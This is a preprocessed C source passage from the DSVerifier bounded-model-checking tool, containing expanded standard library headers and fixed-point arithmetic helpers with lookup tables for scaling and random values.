# 18 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 2
# 1 "/usr/include/assert.h" 1 3 4
# 66 "/usr/include/assert.h" 3 4
extern void __assert_fail (const char *__assertion, const char *__file,
unsigned int __line, const char *__function)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void __assert_perror_fail (int __errnum, const char *__file,
unsigned int __line, const char *__function)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void __assert (const char *__assertion, const char *__file, int __line)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 2
# 1 "/usr/include/stdio.h" 1 3 4
# 27 "/usr/include/stdio.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4
# 28 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4
# 34 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdarg.h" 1 3 4
# 40 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdarg.h" 3 4
typedef __builtin_va_list __gnuc_va_list;
# 37 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__fpos_t.h" 1 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h" 1 3 4
# 13 "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h" 3 4
typedef struct
{
int __count;
union
{
unsigned int __wch;
char __wchb[4];
} __value;
} __mbstate_t;
# 6 "/usr/include/x86_64-linux-gnu/bits/types/__fpos_t.h" 2 3 4
typedef struct _G_fpos_t
{
__off_t __pos;
__mbstate_t __state;
} __fpos_t;
# 40 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__fpos64_t.h" 1 3 4
# 10 "/usr/include/x86_64-linux-gnu/bits/types/__fpos64_t.h" 3 4
typedef struct _G_fpos64_t
{
__off64_t __pos;
__mbstate_t __state;
} __fpos64_t;
# 41 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__FILE.h" 1 3 4
struct _IO_FILE;
typedef struct _IO_FILE __FILE;
# 42 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/FILE.h" 1 3 4
struct _IO_FILE;
typedef struct _IO_FILE FILE;
# 43 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h" 1 3 4
# 35 "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h" 3 4
struct _IO_FILE;
struct _IO_marker;
struct _IO_codecvt;
struct _IO_wide_data;
typedef void _IO_lock_t;
struct _IO_FILE
{
int _flags;
char *_IO_read_ptr;
char *_IO_read_end;
char *_IO_read_base;
char *_IO_write_base;
char *_IO_write_ptr;
char *_IO_write_end;
char *_IO_buf_base;
char *_IO_buf_end;
char *_IO_save_base;
char *_IO_backup_base;
char *_IO_save_end;
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno;
int _flags2;
__off_t _old_offset;
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
_IO_lock_t *_lock;
__off64_t _offset;
struct _IO_codecvt *_codecvt;
struct _IO_wide_data *_wide_data;
struct _IO_FILE *_freeres_list;
void *_freeres_buf;
size_t __pad5;
int _mode;
char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};
# 44 "/usr/include/stdio.h" 2 3 4
# 52 "/usr/include/stdio.h" 3 4
typedef __gnuc_va_list va_list;
# 84 "/usr/include/stdio.h" 3 4
typedef __fpos_t fpos_t;
# 133 "/usr/include/stdio.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/stdio_lim.h" 1 3 4
# 134 "/usr/include/stdio.h" 2 3 4
extern FILE *stdin;
extern FILE *stdout;
extern FILE *stderr;
extern int remove (const char *__filename) __attribute__ ((__nothrow__ , __leaf__));
extern int rename (const char *__old, const char *__new) __attribute__ ((__nothrow__ , __leaf__));
extern int renameat (int __oldfd, const char *__old, int __newfd,
const char *__new) __attribute__ ((__nothrow__ , __leaf__));
# 173 "/usr/include/stdio.h" 3 4
extern FILE *tmpfile (void) ;
# 187 "/usr/include/stdio.h" 3 4
extern char *tmpnam (char *__s) __attribute__ ((__nothrow__ , __leaf__)) ;
extern char *tmpnam_r (char *__s) __attribute__ ((__nothrow__ , __leaf__)) ;
# 204 "/usr/include/stdio.h" 3 4
extern char *tempnam (const char *__dir, const char *__pfx)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) ;
extern int fclose (FILE *__stream);
extern int fflush (FILE *__stream);
# 227 "/usr/include/stdio.h" 3 4
extern int fflush_unlocked (FILE *__stream);
# 246 "/usr/include/stdio.h" 3 4
extern FILE *fopen (const char *__restrict __filename,
const char *__restrict __modes) ;
extern FILE *freopen (const char *__restrict __filename,
const char *__restrict __modes,
FILE *__restrict __stream) ;
# 279 "/usr/include/stdio.h" 3 4
extern FILE *fdopen (int __fd, const char *__modes) __attribute__ ((__nothrow__ , __leaf__)) ;
# 292 "/usr/include/stdio.h" 3 4
extern FILE *fmemopen (void *__s, size_t __len, const char *__modes)
__attribute__ ((__nothrow__ , __leaf__)) ;
extern FILE *open_memstream (char **__bufloc, size_t *__sizeloc) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void setbuf (FILE *__restrict __stream, char *__restrict __buf) __attribute__ ((__nothrow__ , __leaf__));
extern int setvbuf (FILE *__restrict __stream, char *__restrict __buf,
int __modes, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern void setbuffer (FILE *__restrict __stream, char *__restrict __buf,
size_t __size) __attribute__ ((__nothrow__ , __leaf__));
extern void setlinebuf (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int fprintf (FILE *__restrict __stream,
const char *__restrict __format, ...);
extern int printf (const char *__restrict __format, ...);
extern int sprintf (char *__restrict __s,
const char *__restrict __format, ...) __attribute__ ((__nothrow__));
extern int vfprintf (FILE *__restrict __s, const char *__restrict __format,
__gnuc_va_list __arg);
extern int vprintf (const char *__restrict __format, __gnuc_va_list __arg);
extern int vsprintf (char *__restrict __s, const char *__restrict __format,
__gnuc_va_list __arg) __attribute__ ((__nothrow__));
extern int snprintf (char *__restrict __s, size_t __maxlen,
const char *__restrict __format, ...)
__attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 3, 4)));
extern int vsnprintf (char *__restrict __s, size_t __maxlen,
const char *__restrict __format, __gnuc_va_list __arg)
__attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__, 3, 0)));
# 379 "/usr/include/stdio.h" 3 4
extern int vdprintf (int __fd, const char *__restrict __fmt,
__gnuc_va_list __arg)
__attribute__ ((__format__ (__printf__, 2, 0)));
extern int dprintf (int __fd, const char *__restrict __fmt, ...)
__attribute__ ((__format__ (__printf__, 2, 3)));
extern int fscanf (FILE *__restrict __stream,
const char *__restrict __format, ...) ;
extern int scanf (const char *__restrict __format, ...) ;
extern int sscanf (const char *__restrict __s,
const char *__restrict __format, ...) __attribute__ ((__nothrow__ , __leaf__));
extern int fscanf (FILE *__restrict __stream, const char *__restrict __format, ...) __asm__ ("" "__isoc99_fscanf")
;
extern int scanf (const char *__restrict __format, ...) __asm__ ("" "__isoc99_scanf")
;
extern int sscanf (const char *__restrict __s, const char *__restrict __format, ...) __asm__ ("" "__isoc99_sscanf") __attribute__ ((__nothrow__ , __leaf__))
;
# 432 "/usr/include/stdio.h" 3 4
extern int vfscanf (FILE *__restrict __s, const char *__restrict __format,
__gnuc_va_list __arg)
__attribute__ ((__format__ (__scanf__, 2, 0))) ;
extern int vscanf (const char *__restrict __format, __gnuc_va_list __arg)
__attribute__ ((__format__ (__scanf__, 1, 0))) ;
extern int vsscanf (const char *__restrict __s,
const char *__restrict __format, __gnuc_va_list __arg)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__format__ (__scanf__, 2, 0)));
extern int vfscanf (FILE *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vfscanf")
__attribute__ ((__format__ (__scanf__, 2, 0))) ;
extern int vscanf (const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vscanf")
__attribute__ ((__format__ (__scanf__, 1, 0))) ;
extern int vsscanf (const char *__restrict __s, const char *__restrict __format, __gnuc_va_list __arg) __asm__ ("" "__isoc99_vsscanf") __attribute__ ((__nothrow__ , __leaf__))
__attribute__ ((__format__ (__scanf__, 2, 0)));
# 485 "/usr/include/stdio.h" 3 4
extern int fgetc (FILE *__stream);
extern int getc (FILE *__stream);
extern int getchar (void);
extern int getc_unlocked (FILE *__stream);
extern int getchar_unlocked (void);
# 510 "/usr/include/stdio.h" 3 4
extern int fgetc_unlocked (FILE *__stream);
# 521 "/usr/include/stdio.h" 3 4
extern int fputc (int __c, FILE *__stream);
extern int putc (int __c, FILE *__stream);
extern int putchar (int __c);
# 537 "/usr/include/stdio.h" 3 4
extern int fputc_unlocked (int __c, FILE *__stream);
extern int putc_unlocked (int __c, FILE *__stream);
extern int putchar_unlocked (int __c);
extern int getw (FILE *__stream);
extern int putw (int __w, FILE *__stream);
extern char *fgets (char *__restrict __s, int __n, FILE *__restrict __stream)
;
# 603 "/usr/include/stdio.h" 3 4
extern __ssize_t __getdelim (char **__restrict __lineptr,
size_t *__restrict __n, int __delimiter,
FILE *__restrict __stream) ;
extern __ssize_t getdelim (char **__restrict __lineptr,
size_t *__restrict __n, int __delimiter,
FILE *__restrict __stream) ;
extern __ssize_t getline (char **__restrict __lineptr,
size_t *__restrict __n,
FILE *__restrict __stream) ;
extern int fputs (const char *__restrict __s, FILE *__restrict __stream);
extern int puts (const char *__s);
extern int ungetc (int __c, FILE *__stream);
extern size_t fread (void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream) ;
extern size_t fwrite (const void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __s);
# 673 "/usr/include/stdio.h" 3 4
extern size_t fread_unlocked (void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream) ;
extern size_t fwrite_unlocked (const void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream);
extern int fseek (FILE *__stream, long int __off, int __whence);
extern long int ftell (FILE *__stream) ;
extern void rewind (FILE *__stream);
# 707 "/usr/include/stdio.h" 3 4
extern int fseeko (FILE *__stream, __off_t __off, int __whence);
extern __off_t ftello (FILE *__stream) ;
# 731 "/usr/include/stdio.h" 3 4
extern int fgetpos (FILE *__restrict __stream, fpos_t *__restrict __pos);
extern int fsetpos (FILE *__stream, const fpos_t *__pos);
# 757 "/usr/include/stdio.h" 3 4
extern void clearerr (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int feof (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern int ferror (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void clearerr_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int feof_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern int ferror_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void perror (const char *__s);
# 1 "/usr/include/x86_64-linux-gnu/bits/sys_errlist.h" 1 3 4
# 26 "/usr/include/x86_64-linux-gnu/bits/sys_errlist.h" 3 4
extern int sys_nerr;
extern const char *const sys_errlist[];
# 782 "/usr/include/stdio.h" 2 3 4
extern int fileno (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern int fileno_unlocked (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
# 800 "/usr/include/stdio.h" 3 4
extern FILE *popen (const char *__command, const char *__modes) ;
extern int pclose (FILE *__stream);
extern char *ctermid (char *__s) __attribute__ ((__nothrow__ , __leaf__));
# 840 "/usr/include/stdio.h" 3 4
extern void flockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int ftrylockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void funlockfile (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
# 858 "/usr/include/stdio.h" 3 4
extern int __uflow (FILE *);
extern int __overflow (FILE *, int);
# 873 "/usr/include/stdio.h" 3 4
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 2
# 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
void __DSVERIFIER_assume(_Bool expression){
__CPROVER_assume(expression);
}
void __DSVERIFIER_assert(_Bool expression){
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
((void) sizeof ((
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
expression
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
expression
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
) ; else __assert_fail (
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
"expression"
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h", 36, __extension__ __PRETTY_FUNCTION__); }))
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
;
}
void __DSVERIFIER_assert_msg(_Bool expression, char * msg){
printf("%s", msg);
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
((void) sizeof ((
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
expression
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
expression
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
) ; else __assert_fail (
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
"expression"
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h", 41, __extension__ __PRETTY_FUNCTION__); }))
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
;
}
# 22 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" 1
# 27 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdint.h" 1 3 4
# 9 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdint.h" 3 4
# 1 "/usr/include/stdint.h" 1 3 4
# 26 "/usr/include/stdint.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4
# 27 "/usr/include/stdint.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wchar.h" 1 3 4
# 29 "/usr/include/stdint.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 30 "/usr/include/stdint.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 1 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/stdint-uintn.h" 3 4
typedef __uint8_t uint8_t;
typedef __uint16_t uint16_t;
typedef __uint32_t uint32_t;
typedef __uint64_t uint64_t;
# 38 "/usr/include/stdint.h" 2 3 4
typedef __int_least8_t int_least8_t;
typedef __int_least16_t int_least16_t;
typedef __int_least32_t int_least32_t;
typedef __int_least64_t int_least64_t;
typedef __uint_least8_t uint_least8_t;
typedef __uint_least16_t uint_least16_t;
typedef __uint_least32_t uint_least32_t;
typedef __uint_least64_t uint_least64_t;
typedef signed char int_fast8_t;
typedef long int int_fast16_t;
typedef long int int_fast32_t;
typedef long int int_fast64_t;
# 71 "/usr/include/stdint.h" 3 4
typedef unsigned char uint_fast8_t;
typedef unsigned long int uint_fast16_t;
typedef unsigned long int uint_fast32_t;
typedef unsigned long int uint_fast64_t;
# 87 "/usr/include/stdint.h" 3 4
typedef long int intptr_t;
typedef unsigned long int uintptr_t;
# 101 "/usr/include/stdint.h" 3 4
typedef __intmax_t intmax_t;
typedef __uintmax_t uintmax_t;
# 10 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stdint.h" 2 3 4
# 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" 2
# 1 "/usr/include/inttypes.h" 1 3 4
# 34 "/usr/include/inttypes.h" 3 4
typedef int __gwchar_t;
# 266 "/usr/include/inttypes.h" 3 4
typedef struct
{
long int quot;
long int rem;
} imaxdiv_t;
# 290 "/usr/include/inttypes.h" 3 4
extern intmax_t imaxabs (intmax_t __n) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__));
extern imaxdiv_t imaxdiv (intmax_t __numer, intmax_t __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__));
extern intmax_t strtoimax (const char *__restrict __nptr,
char **__restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__));
extern uintmax_t strtoumax (const char *__restrict __nptr,
char ** __restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__));
extern intmax_t wcstoimax (const __gwchar_t *__restrict __nptr,
__gwchar_t **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__));
extern uintmax_t wcstoumax (const __gwchar_t *__restrict __nptr,
__gwchar_t ** __restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__));
# 432 "/usr/include/inttypes.h" 3 4
# 29 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h" 2
# 30 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
extern implementation impl;
typedef int64_t fxp_t;
fxp_t _fxp_one;
fxp_t _fxp_half;
fxp_t _fxp_minus_one;
fxp_t _fxp_min;
fxp_t _fxp_max;
double _dbl_max;
double _dbl_min;
fxp_t _fxp_fmask;
fxp_t _fxp_imask;
static const double scale_factor[31] = { 1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 64.0,
128.0, 256.0, 512.0, 1024.0, 2048.0, 4096.0, 8192.0, 16384.0, 32768.0,
65536.0, 131072.0, 262144.0, 524288.0, 1048576.0, 2097152.0, 4194304.0,
8388608.0, 16777216.0, 33554432.0, 67108864.0, 134217728.0,
268435456.0, 536870912.0, 1073741824.0 };
static const double scale_factor_inv[31] = { 1.0, 0.5, 0.25, 0.125, 0.0625,
0.03125, 0.015625, 0.0078125, 0.00390625, 0.001953125, 0.0009765625,
0.00048828125, 0.000244140625, 0.0001220703125, 0.00006103515625,
0.000030517578125, 0.000015258789063, 0.000007629394531,
0.000003814697266, 0.000001907348633, 0.000000953674316,
0.000000476837158, 0.000000238418579, 0.000000119209290,
0.000000059604645, 0.000000029802322, 0.000000014901161,
0.000000007450581, 0.000000003725290, 0.000000001862645,
0.000000000931323 };
static const float rand_uni[10000] = { -0.486240329978498f, -0.0886462298529236f, -0.140307596103306f, 0.301096597450952f, 0.0993171079928659f, 0.971751769763271f, 0.985173975730828f, 0.555993645184930f, 0.582088652691427f, -0.153377496651175f, 0.383610009058905f, -0.335724126391271f, 0.978768141636516f, -0.276250018648572f, 0.390075705739569f, -0.179022404038782f, 0.690083827115783f, -0.872530132490992f, -0.970585763293203f, -0.581476053441704f, -0.532614615674888f, -0.239699306693312f, -0.678183014035494f, 0.349502640932782f, -0.210469890686263f, 0.841262085391842f, -0.473585465151401f, 0.659383565443701f, -0.651160036945754f, -0.961043527561335f, -0.0814927639199137f, 0.621303110569702f, -0.784529166943541f, 0.0238464770757800f, 0.392694728594110f, 0.776848735202001f, 0.0870059709310509f, 0.880563655271790f, 0.883457036977564f, -0.249235082877382f, -0.691040749216870f, 0.578731120064320f, -0.973932858000832f, -0.117699105431720f, -0.723831748151088f, -0.483149657477524f, -0.821277691383664f, -0.459725618100875f, 0.148175952221864f, 0.444306875534854f, -0.325610376336498f, 0.544142311404910f, -0.165319440455435f, 0.136706800705517f, 0.543312481350682f, 0.467210959764607f, -0.349266618228534f, -0.660110730565862f, 0.910332331495431f, 0.961049802789367f, -0.786168905164629f, 0.305648402726554f, 0.510815258508885f, 0.0950733260984060f, 0.173750645487898f, 0.144488668408672f, 0.0190031984466126f, -0.299194577636724f, 0.302411647442273f, -0.730462524226212f, 0.688646006554796f, 0.134948379722118f, 0.533716723458894f, -0.00226300779660438f, -0.561340777806718f, 0.450396313744017f, -0.569445876566955f, 0.954155246557698f, -0.255403882430676f, -0.759820984120828f, -0.855279790307514f, -0.147352581758156f, -0.302269055643746f, -0.642038024364086f, -0.367405981107491f, 0.491844011712164f, -0.542191710121194f, -0.938294043323732f, 0.683979894338020f, 0.294728290855287f, 0.00662691839443919f, -0.931040350582855f, 0.152356209974418f, 0.678620860551457f, -0.534989269238408f, 0.932096367913226f, -0.0361062818028513f, -0.847189697149530f, -0.975903030160255f, 0.623293205784014f, -0.661289688031659f, 0.724486055119603f, 0.307504095172835f, 0.00739266163731767f, -0.393681596442097f, 0.0313739422974388f, 0.0768157689673350f, -0.652063346886817f, 0.864188030044388f, -0.588932092781034f, 0.496015896758580f, -0.872858269231211f, 0.978780599551039f, -0.504887732991147f, -0.462378791937628f, 0.0141726829338038f, 0.769610007653591f, 0.945233033188923f, -0.782235375325016f, -0.832206533738799f, 0.745634368088673f, -0.696969510157151f, -0.0674631869948374f, -0.123186450806584f, -0.359158959141949f, -0.393882649464391f, 0.441371446689899f, -0.829394270569736f, -0.301502651277431f, -0.996215501187289f, 0.934634037393066f, -0.282431114746289f, -0.927550795619590f, -0.437037530043415f, -0.360426812995980f, 0.949549724575862f, 0.502784616197919f, 0.800771681422909f, -0.511398929004089f, 0.309288504642554f, -0.207261227890933f, 0.930587995125773f, -0.777029876696670f, -0.489329175755640f, -0.134595132329858f, 0.285771358983518f, 0.182331373854387f, -0.544110494560697f, 0.278439882883985f, -0.556325158102182f, 0.579043806545889f, 0.134648133801916f, 0.602850725479294f, -0.151663563868883f, 0.180694361855878f, -0.651591295315595f, 0.281129147768056f, -0.580047306475484f, 0.687883075491433f, 0.279398670804288f, -0.853428128249503f, -0.532609367372680f, -0.821156786377917f, -0.181273229058573f, -0.983898569846882f, -0.0964374318311501f, 0.880923372124250f, 0.102643371392389f, 0.893615387135596f, -0.259276649383649f, 0.699287743639363f, 0.402940604635828f, -0.110721596226581f, 0.0846246472582877f, 0.820733021865405f, 0.795578903285308f, -0.495144122011537f, 0.273150029257472f, -0.268249949701437f, 0.231982193341980f, 0.694211299124074f, 0.859950868718233f, 0.959483382623794f, -0.422972626833543f, -0.109621798738360f, 0.433094703426531f, 0.694025903378851f, 0.374478987547435f, -0.293668545105608f, -0.396213864190828f, -0.0632095887099047f, -0.0285139536748673f, 0.831794132192390f, -0.548543088139238f, 0.791869201724680f, 0.325211484201845f, 0.155274810721772f, -0.112383643064821f, -0.674403070297721f, 0.642801068229810f, -0.615712048835242f, -0.322576771285566f, -0.409336818836595f, 0.548069973193770f, -0.386353709407947f, -0.0741664985357784f, 0.619639599324983f, -0.815703814931314f, 0.965550307223862f, 0.623407852683828f, -0.789634372832984f, 0.736750050047572f, -0.0269443926793700f, 0.00545706093721488f, -0.315712479832091f, -0.890110021644720f, -0.869390443173846f, -0.381538869981866f, -0.109498998005949f, 0.131433952330613f, -0.233452413139316f, 0.660289822785465f, 0.543381186340023f, -0.384712418750451f, -0.913477554164890f, 0.767102957655267f, -0.115129944521936f, -0.741161985822647f, -0.0604180020782450f, -0.819131535144059f, -0.409539679760029f, 0.574419252943637f, -0.0440704617157433f, 0.933173744590532f, 0.261360623390448f, -0.880290575543046f, 0.329806293425492f, 0.548915621667952f, 0.635187167795234f, -0.611034070318967f, 0.458196727901944f, 0.397377226781023f, 0.711941361933987f, 0.782147744383368f, -0.00300685339552631f, 0.384687233450957f, 0.810102466029521f, 0.452919847968424f, -0.183164257016897f, -0.755603185485427f, -0.604334477365858f, -0.786222413488860f, -0.434887500763099f, -0.678845635625581f, -0.381200370488331f, -0.582350534916068f, -0.0444427346996734f, 0.116237247526397f, -0.364680921206275f, -0.829395404347498f, -0.258574590032613f, -0.910082114298859f, 0.501356900925997f, 0.0295361922006900f, -0.471786618165219f, 0.536352925101547f, -0.316120662284464f, -0.168902841718737f, 0.970850119987976f, -0.813818666854395f, -0.0861183123848732f, 0.866784827877161f, 0.535966478165739f, -0.806958669103425f, -0.627307415616045f, -0.686618354673079f, 0.0239165685193152f, 0.525427699287402f, 0.834079334357391f, -0.527333932295852f, 0.130970034225907f, -0.790218350377199f, 0.399338640441987f, 0.133591886379939f, -0.181354311053254f, 0.420121912637914f, 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-0.790927430842686f, 0.691168535237102f, 0.806014327242002f, -0.981639450008060f, 0.407200095027265f, 0.918249921845949f, 0.776880149695420f, -0.437773083955269f, -0.385117533333437f, 0.0115152415796460f, 0.687224538003991f, 0.992524870612626f, 0.471003324792228f, -0.873541777412034f, -0.560923118634380f, -0.726151823613842f, -0.538941951730010f, 0.772057551475325f, 0.858490725829641f, -0.168849338472479f };
# 102 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
fxp_t wrap(fxp_t kX, fxp_t kLowerBound, fxp_t kUpperBound)
{
int32_t range_size = kUpperBound - kLowerBound + 1;
if (kX < kLowerBound){
kX += range_size * ((kLowerBound - kX) / range_size + 1);
}
return kLowerBound + (kX - kLowerBound) % range_size;
}
fxp_t fxp_get_int_part(fxp_t in) {
return ((in < 0) ? -((-in) & _fxp_imask) : in & _fxp_imask);
}
fxp_t fxp_get_frac_part(fxp_t in) {
return ((in < 0) ? -((-in) & _fxp_fmask) : in & _fxp_fmask);
}
float fxp_to_float(fxp_t fxp);
fxp_t fxp_quantize(fxp_t aquant) {
if (overflow_mode == 2) {
if(aquant < _fxp_min) {
return _fxp_min;
}
else if(aquant > _fxp_max) {
return _fxp_max;
}
}
else if (overflow_mode == 3) {
if(aquant < _fxp_min || aquant > _fxp_max) {
return wrap(aquant, _fxp_min, _fxp_max);
}
}
return (fxp_t) aquant;
}
void fxp_verify_overflow(fxp_t value){
fxp_quantize(value);
printf("An Overflow Occurred in system's output");
__DSVERIFIER_assert(value <= _fxp_max && value >= _fxp_min);
}
void fxp_verify_overflow_node(fxp_t value, char* msg){
if (1 == 2)
{
printf("%s",msg);
__DSVERIFIER_assert(value <= _fxp_max && value >= _fxp_min);
}
}
void fxp_verify_overflow_array(fxp_t array[], int n){
int i=0;
for(i=0; i<n;i++){
fxp_verify_overflow(array[i]);
}
}
fxp_t fxp_int_to_fxp(int in) {
fxp_t lin;
lin = (fxp_t) in*_fxp_one;
return lin;
}
int fxp_to_int(fxp_t fxp) {
if(fxp >= 0){
fxp += _fxp_half;
} else {
fxp -= _fxp_half;
}
fxp >>= impl.frac_bits;
return (int) fxp;
}
fxp_t fxp_float_to_fxp(float f) {
fxp_t tmp;
double ftemp;
ftemp = f * scale_factor[impl.frac_bits];
if(f >= 0) {
tmp = (fxp_t)(ftemp + 0.5);
}
else {
tmp = (fxp_t)(ftemp - 0.5);
}
return tmp;
}
fxp_t fxp_double_to_fxp(double value) {
fxp_t tmp;
double ftemp = value * scale_factor[impl.frac_bits];
if (rounding_mode == 0){
if(value >= 0) {
tmp = (fxp_t)(ftemp + 0.5);
}
else {
tmp = (fxp_t)(ftemp - 0.5);
}
} else if(rounding_mode == 1){
tmp = (fxp_t) ftemp;
double residue = ftemp - tmp;
if ((value < 0) && (residue != 0)){
ftemp = ftemp - 1;
tmp = (fxp_t) ftemp;
}
} else if (rounding_mode == 0){
tmp = (fxp_t) ftemp;
}
return tmp;
}
